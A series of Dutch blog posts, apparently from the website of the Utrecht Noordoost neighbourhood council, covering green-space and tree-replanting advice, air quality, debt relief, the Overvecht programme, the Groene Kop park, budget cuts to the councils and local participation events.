Wij allemaal als leden van de wijkraad wilden zelf meer groen en we hoopten dat groen de grote winnaar zou worden. De geluiden die we hoorden waren positief voor de groene kant, maar we wilden niet dat men dacht dat we de resultaten naar onze eigen hand zouden zetten, vandaar het onafhankelijke bureau. Een ander punt wat aandacht behoefde  was kwaliteit dus niet alleen de hoeveelheid groen maar ook de locatie en inrichting daarvan.  Groen als berm tussen snelwegen werd toen door de gemeente als groen beschouwd maar niet door bewoners. Ga jij met je kinderen picknicken in berm tussen de snelwegen in?

Door de motivatie van Wethouder Robert Giesberts heeft de wijkraad het volgende advies uitgebracht aangaande zelf beheer wat tuinieren betreft. We hoeven niet te vertellen wat voor een  impact dat gehad heeft in de stad qua verbeterde lucht en meer groen in beeld, laat staan al het extra plezier dat een grote hoeveelheid  bewoners hierdoor heeft gekregen.

Het advies “Advies Wijkraad Noordoost Beheer Openbaar Groen 2006”
De reactie “Gemeentebericht – Reactie op Wijkraad Groen Advies 2006”

Ik citeer uit bovenstaand advies, graag zelf helemaal lezen. “Wethouder Robert Giesberts:  Overigens waardeer ik het zeer dat u een advies uitgebracht heeft over dit onderwerp. Ik hoop dat we gezamenlijk …….. ”
Dit is verder gaan groeien en in 2009 hebben we ‘Duurzaamheid’ als onderwerp toegevoegd, inmiddels zijn we 10 jaar verder.

http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/DEFINITIEF-Wijkraadpleging-Noordoost-Duurzaam-Wonen-2009-2010.pdf

Nu terug naar de bomen, een integraal onderdeel van alles om ons heen. Willen we überhaupt in leven blijven dan zal er een groot aantal bomen bij moeten komen dat wat er nu gekapt wordt.  Vandaar 1 van onze laatste adviezen.

https://www.utrecht.nl/fileadmin/uploads/documenten/bestuur-en-organisatie/initiatief-en-invloed/Adviezen_van_wijkraden/Noordoost/2018-06-Advies-wijkraad-noordoost-Herplanten-bomen.pdf

https://www.utrecht.nl/fileadmin/uploads/documenten/bestuur-en-organisatie/initiatief-en-invloed/Adviezen_van_wijkraden/Noordoost/2018-12-antwoordbrief-aan-wijkraad-noordoost-over-herplant-bomen.pdf

We willen hiermee laten zien hoe een groep vrijwilligers zich ingezet heeft om hun milieu te beschermen en waar het kon ook ‘verbeteren.’ Het is essentieel dat deze groep vrijwilligers herkend en erkend wordt. Veel van de gegevens bijeengebracht door deze groep zijn terug te vinden in de verschillende partij programma’s.

Facebooktwittergoogle_pluspinterest

Luchtmeetnet

Wat is dat nou weer?
Het is een fantastische ontwikkeling die ons allen kan helpen.
Helpen in de zin van weten welke troep er in de lucht zit.

Van Albert Faber op Twitter het volgende gelezen: “Fijnstof op de Kardinaal de Jongweg (nieuwjaarsnacht) 1250 ug/m3 . Extreem hoog, de wettelijke norm is 50. Het was 4x hoger dan een slechte dag in Delhi. Een pakje sigaretten in een uur is gezonder.”

Toen ik dat las laat ik eens verder kijken, ik was verbaasd. Ik weet weinig over luchtkwaliteit. Uiteraard van fijnstof heb ik gehoord. Maar waar is het, wanneer, welke concentratie?
Het is makkelijk uit te zoeken, kijk op  https://www.luchtmeetnet.nl/


De dagelijkse concentratie fijn stof (PM2.5) is afhankelijk van het weer. In de steden zijn de concentraties overdag gemiddeld iets hoger dan ‘s nachts, vooral door de verkeersbijdrage. PM2.5 is een verzamelnaam voor zwevende, inhaleerbare deeltjes met een maximale doorsnede van 0,0025 millimeter. De wettelijke norm is een jaargemiddelde van 25 (μg/m3). Doordat PM2.5 nog kleiner is dan PM10 kunnen deze deeltjes dieper doordringen in de longen en zijn ze schadelijker voor de gezondheid. Een ieder kan zien waar de luchtkwaliteit abominabel is.

Bekijk alle stations waar Fijn stof (PM2.5) wordt gemeten

 

Facebooktwittergoogle_pluspinterest

Oude schoenen weggooien zonder nieuwe te hebben?

Nee dat gaan we niet doen!
De feestdagen zijn voorbij, we moeten weer aan de bak, zowel Professioneel alsmede ons vrijwilligerswerk gaan we weer aan de slag. De wijkraden staan voor een uitdaging. De politiek wil een andere vorm van participatie.
Het budget voor de wijkraden is flink teruggeschroefd. Dat leverde veel onvrede op.
Na gezamenlijk overleg van alle wijkraden met de wethouder heeft de Wijkraad Leidsche Rijn zich opgeheven en in Noordoost heeft het dagelijks bestuur en een aantal leden zich teruggetrokken.

Echter: er liggen nieuwe kansen. Sabine Hol en Frans Werter hebben een breed gezelschap geformeerd. Ambtenaren, raadsleden en vertegenwoordigers van de wijkraden met ingrediënten om een nieuwe participatie soep te koken.

In maart wordt een grote bijeenkomst gehouden met als doel:

 • Het bereiken van de buurten
 • Welke participatie vormen zijn mogelijk
 • Hoe bereikt men zoveel mogelijk burgers

Op oude schoenen moeten we een nieuwe, gangbare, leest ontwikkelen en samen gaan dat zeker doen.Bekijk deze plaatjes om een idee te krijgen van de enerverende bijeenkomst: ambtenaren, wethouder, wijkraden, raadsleden & smaakmakers van Utrecht. Het gaat niet om de ego’s van enkelingen, een ieder moet gezien en gehoord worden.

Facebooktwittergoogle_pluspinterest

Schulden Stress Vermindering

Dit is een onderwerp wat aan het hart ligt van onze Wijkwethouder Noordoost, Linda Voortman. Hier is een Twitter citaat van Linda: “Ik wil meer mensen uit de schulden helpen. Daarom gaan we vaker schulden afkopen. Dat scheelt stress bij mensen en ze weten sneller waar ze aan toe zijn.” & “Een laag inkomen mag geen belemmering zijn om mee te doen.”

Het is natuurlijk niet bij citaten gebleven. Vanaf 1 januari is er extra geld beschikbaar voor Utrechters met een laag inkomen. Kijk op http://www.utrecht.nl/extravooru  om te zien of u ervoor in aanmerking komt.

https://www.duic.nl/algemeen/gemeente-gaat-vaker-schulden-afkopen-voor-inwoners/
https://www.duic.nl/algemeen/meer-geld-voor-utrechters-met-een-laag-inkomen/

Voor nog meer en andere contacten kunt u bij het volgende terecht: https://armoedecoalitie-utrecht.nl/contact/  Op hun webpagina staat:

“In Utrecht leven ongeveer 25.000 huishoudens in armoede. Hoewel er veel voorzieningen voor hen bestaan, valt het niet mee om snel te achterhalen welke regelingen en voorzieningen voorhanden zijn. Op deze pagina geven we daar een overzicht van. Hierin werken we samen met U Gids waarnaar we dikwijls (over en weer) verwijzen. Een deel van deze informatie en tips vindt u eveneens terug in de hand-out Opgroeien in armoede.”

Waarom noemen we dit als wijkraad? Ten eerste vinden wij het uitermate belangrijk om ons te verdiepen in onderwerpen welke behoren tot de portefeuille van onze eigen wethouder. Ten tweede is armoede onder de bewolking van Noordoost iets wat bij ons als wijkraad Noordoost de volle aandacht heeft en gehad heeft. De Wijkraad is jaren geleden intensief betrokken geweest om 1 van onze buurten (waar armoede het meest aanwezig is) namelijk ‘de staatsliedenbuurt’ te voorzien van een flinke financiële injectie gekoppeld aan vele verbeteringen.

Dit allemaal gezegd hebbende kijken wij er naar uit om een tot een fijne samenwerking te komen met onze wethouder. Ook haar ervaringen als voormalig tweede kamer lid zal ons als wijkraad doen inspireren en ons nog meer in staat stellen om de doelstelling aangaande “Geen Armoede Meer in Utrecht” te realiseren.

Facebooktwittergoogle_pluspinterest

Samen voor Overvecht 2019 – 2022

De Versnelling van Overvecht (2016–2018) wordt Samen voor Overvecht (2019–2022)

Afgelopen week heb ik een overleg van de Wijkraad Overvecht bijgewoond. Ik was zo geïnspireerd door hetgeen inhoudelijk besproken werd dat ik de voorzitster Els Wegdam gevraagd heb om een verslag te maken met wat extra historische elementen. Dat heeft ze ook gedaan…l Lees verder, ik hoop dat jij ook geïnspireerd wordt.

Groetjes Christian Naethuys, voorzitter Wijkraad Noordoost


Samen voor Overvecht is een nieuw integraal programmaplan, dat voortborduurt op het eerdere plan De Versnelling, waarin voor de jaren 2016 – 2020 € 10.000.000 toegekend werd aan de wijk.
De wijkraad Overvecht hield in 2017 zijn wijkraadpleging over het onderwerp Gezond en aangenaam wonen in Overvecht. Dat leidde tot een advies op 15 maart 2018 (een paar dagen voor de gemeenteraadsverkiezingen) aan het College van Burgemeester en Wethouders. Dit advies kwam qua timing op een strategisch moment (de gemeenteraadsverkiezingen waren op 21 maart) waardoor belangrijke punten uit het advies een plaats kregen in het coalitieakkoord. Bovendien werd om de “versnelling te verhogen” € 4.000.000 extra toegekend voor de periode 2018-2022.

De Versnelling van Overvecht (2016 – 2018) wordt Samen voor Overvecht 2019 – 2022

De versnelling (2016-2020)
In de Voorjaarsnota 2016 werd als doel benoemd dat meer wijkbewoners volwaardig kunnen meedoen aan de samenleving en dat kinderen een faire kans krijgen op een goede toekomst. Het motto van de versnelling werd ‘op orde komen, meekomen en verder komen’.
Er werden 5 pijlers benoemd waarop gefocust ging worden.
– Gezonde wijk
– Aanpak sociale problematiek
– Opvoeden en opgroeien
– Werk en ondernemerschap
– Veiligheid
In het programmaplan 2018 werd niet gekozen voor een 6e pijler, maar werd wel opgenomen dat in alle pijlers de rol van armoede in de problematiek onderzocht ging worden.

In 2018 stelde de wijkraad kritische vragen over de resultaten en de uitvoering. Er werd o.a. gevraagd hoeveel wijkbewoners inmiddels volwaardig mee waren gaan doen en hoeveel kinderen een faire kans op een goede toekomst hadden gekregen. Lastige vragen omdat er geen SMART-resultaten waren geformuleerd en er geen SWOT-analyses gemaakt waren.


Wat wordt Samen voor Overvecht (2018-2022)?
In dit programma is het uitgangspunt dat de doelstellingen van de Versnelling overeind blijven maar dat er een extra investering van 4 miljoen en een langere looptijd van twee jaar toegekend wordt. In 2023 moet de wijk een fijne plek zijn om te wonen, werken en te verblijven (zie raadsbrief Samen voor Overvecht d.d. 17 oktober 2018).
Daar wordt een nieuw integraal programmaplan voor geschreven. Afspraken zijn inmiddels gemaakt om de resultaten uit nieuwe evaluaties wel meetbaar te maken. Zo doende nog efficiënter te werk te kunnen gaan. De ambitie hiervoor is als volgt geformuleerd:

In Overvecht zetten bewoners zich samen met corporaties, scholen, ondernemers, buurteams, zorg- en welzijnsinstellingen, politie, vele andere organisaties en de gemeente in voor de ontwikkeling van de wijk, SAMEN voor Overvecht! Deze beweging denkt in kansen en werkt samen in vitale coalities vanuit een integrale aanpak aan een aantrekkelijker woonklimaat, meedoen naar vermogen, ruimte voor ondernemerschap, de beste zorg en steun voor de bewoners die dat nodig hebben, perspectief voor de jeugd en verbeteren van de veiligheid. We versterken de kracht van Overvecht, benoemen en pakken de problemen buurt- en wijkgericht aan en werken aan normherstel waar nodig. Daarmee versterken we de veerkracht van de bewoners van de wijk en de leefbaarheid en werken we aan een betere balans tussen dragende en vragende bewoners. We werken samen aan een wijk waar bewoners zich thuis voelen en trots op zijn en die aantrekkelijk is voor bezoekers, nieuwe bewoners, investeerders en ondernemers.

De vijf pijlers worden omgevormd tot vijf thema’s. De pijlers gezondheid en welzijn worden samengevoegd en het thema “aantrekkelijk woonklimaat” wordt toegevoegd.
De vijf thema’s in hoofdlijnen:

Aantrekkelijk woonklimaat
Dit thema sluit aan bij de ambitie uit het Coalitieakkoord om stadsbreed te gaan streven naar een percentage sociale woningbouw van 35%. In Overvecht is dat momenteel nog 72% en dat zal dus fors omlaag moeten, waarbij er in de andere wijken die onder de norm van 35% zitten, de komende decennia een verhoging van het aantal sociale woningen zal moeten worden gerealiseerd.
In Overvecht zal dit moeten leiden tot een meer divers en gemengd woningaanbod (huur & koop, goedkoop/middelbaar en duur) met aandacht voor meer gerichte toewijzing waardoor leefbaarheid en betrokkenheid worden vergroot

Regie van bewoners op hun eigen ontwikkeling en meedoen naar vermogen
Werkloze bewoners krijgen nieuwe kansen. Er komen doorlopende lijnen van activering naar werk met aandacht voor de intrinsieke motivatie van bewoners en belemmerende factoren om mee te doen.
Er komt ruimte voor ondernemerschap met aanpak van het bedrijventerrein Overvecht.

Doen wat nodig is in zorg en ondersteuning om de gezondheid en welbevinden bewoners te verbeteren
Er wordt ingezet op preventie om complexe problematiek te voorkomen, maar ook op integrale ondersteuning van complexe problematiek.
Op gezondheidsgebied wordt voortgebouwd op de stevige basis die al gelegd is door het programma Krachtige Basiszorg: de beweging van Ziekte en Zorg naar Gezondheid en Gedrag en aansluiten bij behoefte en eigen kracht van bewoner

Perspectief voor de Jeugd
Wie de jeugd heeft, heeft ook de toekomst is hier het uitgangspunt. Overvecht heeft relatief veel jongeren en deze groep groeit als percentage van de totale bevolking van Overvecht. De jeugd zal perspectief geboden worden door hen te laten merken dat zij er toe doen en cruciaal zijn voor de toekomst van Overvecht. Waar nodig zullen grenzen gesteld worden en aan normherstel gewerkt worden: een goede mix tussen preventie en aanpakken van knelpunten. Een veilige, prettige omgeving is voor kinderen cruciaal om op te groeien en hun talenten te ontwikkelen.

Veiligheid: preventie waar mogelijk, repressie/norm herstellen waar nodig
De georganiseerde ondermijnende criminaliteit in de wijk zal worden aangepakt.
Focus komt op Jeugdoverlast en criminaliteit waarbij signalering en tegengaan van radicalisering en polarisatie belangrijke aandachtsgebieden zijn.

Deze vijf thema’s worden de komende tijd in samenwerking met partners in de wijk en gemeente verder uitgewerkt tot een integraal programmaplan.”

Els Wegdam – Voorzitter Wijkraad Overvecht

Bekijk hier de presentatie

Facebooktwittergoogle_pluspinterest

Nieuw stadspark met oog voor water

Het gebied tussen de Eykmanlaan, Winklerlaan, volkstuinenpark De Driehoek en de spoorlijn Utrecht-Amersfoort was lange tijd een rommeltje. Volkstuinders, duivenhouders en stadsnomaden gingen er hun gang. En het was slecht toegankelijk voor omwonenden. Na een herinrichting die jaren duurde, opende in maart 2018 stadspark De Groene Kop. Ab Kools is voorzitter van de Wijkraad Noordoost, die zich hier hard voor maakte.

“Doordat het voormalige weidegebied nooit is opgehoogd, is park De Groene Kop het laagste punt van Utrecht”, weet Ab. “Water speelt er een grote rol. Tot voor kort liepen de kelders aan de Professor Reinwardtlaan, die grenst aan het park, regelmatig onder water.” Voor het plan dat de initiatiefnemers – de Wijkraad Noordoost, De Driehoek, buurtcomité Tuindorp-Oost en stichting Het Lachende Paard – in 2011 aan de gemeente voorlegden, kregen zij in totaal zes ton subsidie. Met een deel van dat geld werd de waterhuishouding verbeterd. Het Zwarte Water, dat door de Professor Reinwardtlaan loopt, is nu verbonden met een nieuwe wateropslag in het park. Daarin is ruimte voor 6.000 m2 oppervlaktewater Wateroverlast lijkt er verleden tijd. Ook de andere extra watergangen, die de gemeente samen met het Hoogheemraadschap De Stichtse Rijnlanden aanlegde, komen uit in die wateropslag.

Het hele bericht op DUIC

Facebooktwittergoogle_pluspinterest

Dagelijks bestuur wijkraad Noordoost treedt af

Wijkraad Noordoost treedt af vanwege onvrede over bezuinigingen
Het dagelijks bestuur van de wijkraad Noordoost is collectief afgetreden omdat het zich niet kan vinden in de ‘rigoureuze’ bezuinigingen die de wijkraad treft. ‘Wij voelen ons als oude schoenen weggegooid’, zegt voormalig voorzitter van de wijkraad Ab Kools in een brief aan het college van burgemeester en wethouders.

Het hele artikel bij het AD

De brief die hier aan vooraf ging.

Facebooktwittergoogle_pluspinterest

Manifest wijkraden : Samen Doen!

Samen Doen!

Betrokkenheid van bewoners is geen luxeproduct, het is een fundamentele voorwaarde voor een goed
functionerende lokale democratie. In Zuidwest staan we in nauw contact met bewoners, en horen we nog te vaak
dat zij zich niet betrokken voelen bij lokale besluitvorming, of juist iets in hun omgeving voor elkaar proberen te
krijgen, maar daar niet in slagen. We staan daarom achter de doelstellingen van het traject “Vernieuwen
Participatie”: het in een open samenwerking en brede setting komen tot verbetering van de samenwerking tussen
bewoners en de gemeente.

Een vaak gehoorde kritiek op de wijkraden is dat hun samenstelling geen afspiegeling vormt van de diversiteit in
Utrecht. Wij zien het als onze opgave om actief te blijven zoeken naar nieuwe leden uit groepen die zich
momenteel minder vertegenwoordigd voelen. Tegelijkertijd zien we dat geringe afspiegeling geen
wijkraad-specifiek probleem is, maar een breder kenmerk van politieke participatie in Nederland. We moeten ons
daarom niet blind staren op letterlijke afspiegeling als criterium voor een goed functionerende wijkraad, maar
feitelijk: in hoeverre zijn de wijkraden in staat om bewoners op te zoeken en te horen die weliswaar geen lid zijn
van de raad, maar wel degelijk via de leden van wijkraad willen participeren?

Participatie kun je niet opleggen, deze komt uit de bewoners zelf, uit de wandelgangen van de buurt. De
wijkraden zijn een samenkomst van de meest betrokken bewoners. De leden van de wijkraden leveren door hun
netwerk, kennis van de wijk en continuïteit van hun participatie een wezenlijke en aanzienlijke bijdrage als
schakel tussen de bewoners en de gemeente. Ze komen door hun betrokkenheid en contacten op voor alle
bewoners, zelfs degenen die anders de aansluiting met de gemeente missen.

Wijkraden zijn dus aanvullend op de in het coalitieakkoord voorgestelde verbreding van participatie.
Georganiseerde, structurele participatie is meer dan ooit nodig in een veranderende maatschappij, waarin
stedelijke vraagstukken complexer zijn, vaak een lange termijn bestrijken en zich op verschillende schaalniveaus
– buurt, wijk of stad – afspelen. Wijkraden, met hun langdurig actieve bewoners die juist door hun ervaring in
participatie gemakkelijk mee kunnen praten, vervullen momenteel deze rol en willen die ook graag samen met de
gemeente oppakken.

De Omgevingswet maakt na 2021 bewoners een formele partij bij ruimtelijke ontwikkelingen. De ABCD-formule,
zoals bijvoorbeeld toegepast bij een pilot in Dichterswijk, geeft bewoners een instrument om hun leefomgeving
zelf vorm te geven. Bij al die mogelijke niveaus van participatie is behoefte aan een vaste kern van bewoners die
vanuit hun enthousiasme en ervaring als spil functioneren voor de rest van de buurt: samen doen.

Hoe ziet samen doen er uit? Een organisatie van bewoners die met de gemeente samenwerkt en advies geeft
heeft allereerst formele en structurele erkenning nodig. We zien nu dat het nog te gemakkelijk is om inbreng van
bewoners, zelfs in formele participatietrajecten, te negeren. Erkenning in de vorm van adviesrecht door
besluitvormers en de ambtelijke organisatie is cruciaal voor een gemeente die werkelijk werk zegt te maken van
bewonersbetrokkenheid. Meer gelijkwaardig, ondersteunend en versterkend naar elkaar. Samen doelen
opstellen en plannen maken. Verder zijn korte lijnen essentieel, bijvoorbeeld door nauwe samenwerking met de
wijkbureaus. En tenslotte wellicht het belangrijkste ingrediënt voor succesvolle participatie: positiviteit. Niet “wij
tegen zij”, maar: samen doen!

Namens wijkraad Zuidwest en de voorzitters van de wijkraden,
Jeroen Heijgen (Voorzitter Zuidwest)

Facebooktwittergoogle_pluspinterest

Verkenning verkeersroute Votulast (terugkoppeling)

In januari 2017 is de gemeente gestart met de “Verkenning verkeersroute Votulast”. Het afgelopen jaar is er samen met u gekeken hoe u deze route ervaart en welke ideeën er zijn om deze route te verbeteren. Nu is het tijd om het resultaat te presenteren. Ook bent u welkom op het vragenuur op woensdag 14 maart vanaf 19.00-21.00 uur bij Kargadoor, Oudegracht 36.
Voor vragen over de uitkomsten van de verkenning en/of over het vervolg kunt u contact opnemen met Margreet Kikkert (projectmanager), via telefoon 14030 of e-mail verkeersroute-votulast@utrecht.nl

De verkeersroute Votulast bestaat uit de straten Kaatstraat, Adelaarstraat, Willem van Noortstraat, Antonius Matthaeuslaan, Juliusstraat/ Ingenhouszstraat en Pieter Nieuwlandstraat. Voor de zomer hebben heeft de gemeente met vier inloopbijeenkomsten, een online enquête en een kentekenonderzoek de huidige situatie in beeld gebracht. Met het kentekenonderzoek is het aandeel doorgaand verkeer over de route gemeten. Ook waren er werksessies met omwonenden en ondernemers, waarbij de vragen ‘Hoe het doorgaand verkeer te verminderen?’ en ‘Hoe de straten in te richten als 30 km-gebied’ centraal stonden.
Bron: gemeente Utrecht

Terugkoppeling
Uit de verkenning blijkt dat een groot deel van de automobilisten die op de route rijdt geen herkomst of bestemming in de wijk heeft. Bewoners vinden o.a. dat de straten te druk zijn, dat voetgangers beter moeten kunnen oversteken en dat de leefbaarheid en verblijfskwaliteit langs de route beter kan.
De gemeenteraad is met een brief geïnformeerd over de uitkomsten van deze verkenning. U vindt deze brief en de uitkomsten van de verkenning op www.utrecht.nl/verkeersroute-votulast. Op deze site staan ook de gegevens van het kentekenonderzoek en de uitkomsten van de enquête.

Motie 155
Voor de Wijkraad Noordoost is dit project onderdeel van de vernieuwing van de wijkparticipatie in Utrecht en is op de voet gevolgd in combinatie met een actieve deelname. Lees hierover meer op “Wij in de wijk” inclusief een bijzonder leuk filmpje met Kerstin en Margreet.

Aangevuld op 15-12-2018
Advies Wijkraad
Reactie Gemeente

Facebooktwittergoogle_pluspinterest

7 november: Buurtenparade ‘Samen maken wij Noordoost’

Kom ook naar de buurtenparade op woensdag 7 november van 19.30 uur tot 21.30 uur in Eethuis De Helden!

Op 7 november bent u welkom om mee te praten over de opgaven voor uw buurt. Afgelopen half jaar heeft het Wijkbureau Noordoost in samenwerking met de Wijkraad onderzoek gedaan naar behoeftes uit Utrecht Noordoost. We spraken met studenten, senioren, bezoekers van de Buurtcamping en bewonersorganisaties. Dit onderzoek is gebundeld in de voorlopige opgaven.

De gemeente wil op 7 november graag hierover in gesprek met u. Klopt het wat we zien in uw buurt? Ontbreken er onderwerpen? Praat mee en ontdek wat er al op de planning staat. De onderwerpen variëren van verkeer tot veiligheid.

Kom langs!. Laat u even weten of komt? Dit kan met een e-mail naar noordoost@utrecht.nl<mailto:noordoost@utrecht.nl>, vermeld daarbij in welke buurt u woont. U kunt hier terecht voor meer informatie over hoe wij samen Noordoost maken.

Facebooktwittergoogle_pluspinterest

21 november podiumgesprek over ‘Participatie in de Knel’

Wél meepraten en doen, niet beslissen!
Vinden Utrechters het wel goed zo of willen ze meer zelf bepalen?
Steeds meer Utrechters denken en doen enthousiast mee in de eigen buurt. Met vele uren wordt zelf een speeltuin gedraaid, een buurman geholpen of de straat schoon gehouden. Ook zijn er vele buurtbewoners in de wijkraden of in allerlei straatcomités, die veel tijd steken in het adviseren van de gemeente over hoe het nog beter kan. Veel Utrechters vinden dat ‘als je zelf actief meedenkt en doet, je ook meer zelf moet kunnen beslissen’. Dat lijkt niet het geval.

Het geld van het gemeentefonds voor buurtinitiatieven wordt als een subsidie door ambtenaren verdeeld. En het experiment met een buurtbudget waarmee bewoners zelf over de uitgaven mogen beslissen lijkt niet van de grond te komen. Meerdere buurthuizen en speeltuinen zijn succesvol in beheer genomen door buurtbewoners zelf. Maar het ondersteunen van bewoners(groepen) is door de gemeente toch weer uitbesteed aan een traditionele welzijnsorganisatie van buiten Utrecht en niet aan het alternatieve aanbod van Utrechtse buurtorganisaties. Daarnaast zijn veel Utrechters actief in het welzijn of in de informele (buurt)zorg. Maar de gemeente lijkt hier niet extra in te willen investeren.

Daarover gaat het Podiumgesprek op woensdag 21 november 2018. Over vragen als:
• Zijn er onderwerpen waar buurtbewoners niet alleen over mogen meepraten maar ook zelf over moeten kunnen beslissen?
• Is buurtbewoners zeggenschap geven altijd in conflict met onze gekozen gemeenteraad?
• Als buurtorganisaties succesvol het werk in de buurt uitvoeren, waarom doen we dat dan niet vaker?
• Of zijn de grenzen van de ‘participatiesamenleving’ bereikt en willen bewoners niet nog meer meepraten, meedoen en beslissen?

Tijdens het Podiumgesprek komt iedereen die dat wil aan het woord en hebben we respect voor elkaars mening en cultuur. Je bent van harte welkom op woensdagavond 7 november vanaf 19:00 uur in het ZIMIHC theater Stefanus (Braziliëdreef 2, Utrecht). Stadsbus 1 stopt er elke 10 minuten vlak voor de deur, halte Amazonedreef.

We beginnen om 19:45 en sluiten af om 21:30 uur. Voorafgaand aan het gesprek kun je ter plekke ook mee eten bij Resto VanHarte. Dan wel graag je daar apart voor aanmelden, via https://reserveren.restovanharte.nl/ Voor degenen die niet kunnen komen: Bij UStad is maandagavond 26 november een samenvatting van het Podiumgesprek terug te zien. Meld je aan!

Een andere link met info over Right To Challenge (om je gemeente uit te dagen als bewoner).

Facebooktwittergoogle_pluspinterest

Aanbieden kleurboek wijkraden aan wethouder

Maandag 24 september hadden de voorzitters van de Utrechtse wijkraden een eerste kennismaking met de nieuwe wethouder voor Wijkgericht Werken en Participatie, mevrouw Anke Klein. Sinds het aantreden van het nieuwe College van B&W is er discussie over de rol van de Wijkraden bij het zoeken naar nieuwe wegen om participatie in Utrecht vorm te geven.
Met het aanbieden van een KLEURBOEK willen de gezamenlijke wijkraden een bloemlezing tonen van het werk dat zij vrijwillig doen in en voor de stad. Vrijwillig maar niet vrijblijvend. De wijkraden zijn een bijzonder instrument van burgerparticipatie en hebben zich over verschillende onderwerpen in hun wijk uitgesproken.

De leden van de Wijkraden zijn niet gekozen maar wel proberen de wijkraden een zo goed mogelijke afspiegeling te zijn van de eigen wijk en oor en oog te hebben voor alle bewoners(groepen).
Alle wijkraadsleden hebben een grote en diverse achterban zodat ze weten wat er speelt in hun woonomgeving en zo een bijdrage te leveren aan de wijk en de stad. Elke wijkraad werkt anders, mede door de verschillende samenstelling en talenten van de wijkraadsleden. Deze diversiteit komt in de bloemlezing (bijgevoegd) tot uitdrukking.
De wethouder heeft in de bespreking een drastische bezuiniging op de Wijkraden aangekondigd. We willen nog bestuderen wat dit betekent voor het functioneren van de Wijkraden in Utrecht.

LINK naar KLEURBOEK WIJKRADEN UTRECHT

Facebooktwittergoogle_pluspinterest

Ontmoeten in Veemarkt

Sinds een aantal jaren is er op het voormalige Veemarktterrein een woonwijk gerealiseerd. Vanuit de gemeente afdeling Maatschappelijke ontwikkeling (MO) wil men de behoefte aan ontmoetingsplekken in kaart brengen van de bewoners Veemarkt e.o.

Binnen het project Kersvers hebben de studentbegeleiders Zina Hottentot en Daan van Gils deze behoefte onderzocht.

De resultaten van het onderzoek zijn inmiddels bekend en de samenvatting van het onderzoek kunt u hier lezen.

Facebooktwittergoogle_pluspinterest

Denk mee over gebruik van evenementenlocaties

Evenementen dragen bij aan levendigheid, maar moeten niet voor overlast zorgen. Daarom maakt de gemeente Utrecht samen met onder andere organisatoren en omwonenden, locatieprofielen. Hierin staan de mogelijkheden en regels voor het gebruik van een evenementenlocatie.

U kunt meedenken over het gebruik van enkele locaties. Denk hierbij aan het Griftpark, Maliebaan, Lucasbolwerk en Lepelenburg.

Meer informatie vindt u op de site van de Gemeente Utrecht.

Facebooktwittergoogle_pluspinterest

Positie wijkraden na coalitieakkoord

Het nieuwe college heeft in haar coalitieakkoord opgenomen dat nagedacht moet worden over de toekomst van de wijkraden (in het perspectief van nieuwe vormen van participatie). Ook is daarin een bezuiniging van €200.000 opgenomen. Dit heeft tot grote verbazing bij de wijkraden geleid omdat zij hierover niet zijn geïnformeerd. In de pers zijn een aantal berichten verschenen. Tevens hebben de wijkraden gezamenlijk een brief naar het nieuwe college gestuurd.

Na het overleg met alle 10 wijkraden van Utrecht is deze brief naar het nieuwe college gegaan.

Onderstaande berichten op diverse media spreken voor zich
23-06-2018 Wijkraden: ‘Subsidie mag pas omlaag zodra er een alternatief is’
21-06-2018 Wees een beetje lief voor de wijkraden nu ze er nog zijn
20-06-2018 Voorlopig nog geen alternatief voor wijkraden in Utrecht
19-06-2018 Nieuw coalitieakkoord lijkt nekslag voor Utrechtse wijkraden

Website van de gemeente met alle wijkraden
Website van de gemeente met adviezen van alle wijkraden

Facebooktwittergoogle_pluspinterest

De buurt heeft mooie plannen

In de buurten Lauwerecht/Staatsliedenbuurt in Utrecht-Noordoost komen er nu 800 woningen in de plaats van kantoren, zoals de gebouwen van de Belastingdienst en het UWV. De meeste woningen zijn bedoeld voor studenten en starters. Zo’n grote bouwactiviteit brengt veel vragen met zich mee. De Wijkraad Noordoost vindt de belangrijkste vraag:
“Hoe kunnen huidige en toekomstige bewoners een rol nemen in het adviseren van de gemeente en de bouwende partijen (waaronder MITROS) om tot een zo groot mogelijke kwaliteitsverbetering van het gebied te komen?”

Het Bewonersplatform Staatslieden/Lauwerecht heeft gisteren haar advies hierover aangeboden aan de wijkwethouder, Victor Everhardt, in buurthuis De Leeuw. Namens het Bewonersplatform zei Bart Smit dat men in juni 2017 is gestart met deze groep die inmiddels is uitgegroeid tot zo’n zestig betrokkenen. Tevens is een petitie opgesteld en overhandigd over enkele bouwplannen.

De Wijkraad Noordoost heeft over dit proces en resultaat een advies verstrekt aan het (nieuwe) College van Burgemeester en Wethouders met als belangrijkste gegeven:
– Een visie- en ambitiedocument voor deze buurt(en) op te stellen,
– In dialoog met bewoners en ondernemers, en er
– Een toereikend budget aan toe te kennen.
Wijkwethouder Everhardt gaf er blijk van in te zien dat nu de gemeente aan zet is. Hij wil zich inzetten voor een zo spoedig mogelijke reactie van het nieuwe College van B&W. Persoonlijk gaf hij aan een dergelijke dialoog heel belangrijk te vinden.

Facebooktwittergoogle_pluspinterest

Opening Park de Groene Kop

Afgelopen donderdag 15 maart is het nieuwe park De Groene Kop geopend.
Het gebied is gelegen tussen de Eykmanlaan, Winklerlaan, het volkstuinenpark de Driehoek en de spoorlijn Utrecht-Amersfoort. Het gebied is een overblijfsel van het weidegebied dat hier tot in de twintigste eeuw aanwezig was.

https://platform-duic.imgix.net/app/uploads/sites/2/2018/03/Park_de_groene_kop_4-1.jpg?auto=format&ch=Width%2CDPR%2CSave-Data&fit=max&ixlib=php-1.1.0&q=35

De voorzitter van de wijkraad, Ab Kools, heeft samen met de wethouder Geldof het park geopend. Zijn openingsspeech treft u hier aan. Meer informatie en foto’s leest u in DUIC.

Facebooktwittergoogle_pluspinterest

Theater van de Toekomst

Verschillende organisaties (onder meer: Wijk&Co, Buurtteam, Wijkbureau) willen u uitnodigen om op 22 maart 2018 van 16.00 uur tot 20.00 uur een kijkje te komen nemen bij het Theater van de Toekomst. Er is een mooi programma samengesteld voor en door de wijk met het oog op de toekomst.

Het theater van de toekomst biedt een kijkje in de mogelijkheden die er zijn om op een prettige manier langer in de wijk te blijven wonen. Naast een mooie theatervoorstelling van het STUT theater zijn er rondom vier thema’s informatie stands: Sociale netwerken, Informatievoorzieningen (online en offline), Gezondheid (fysiek en mentaal) en Wonen, Zorg en Domotica.

Voor meer informatie:

Kom ook de 22e!

Facebooktwittergoogle_pluspinterest

Bewonersavond Arkin aan de Wittevrouwenkade

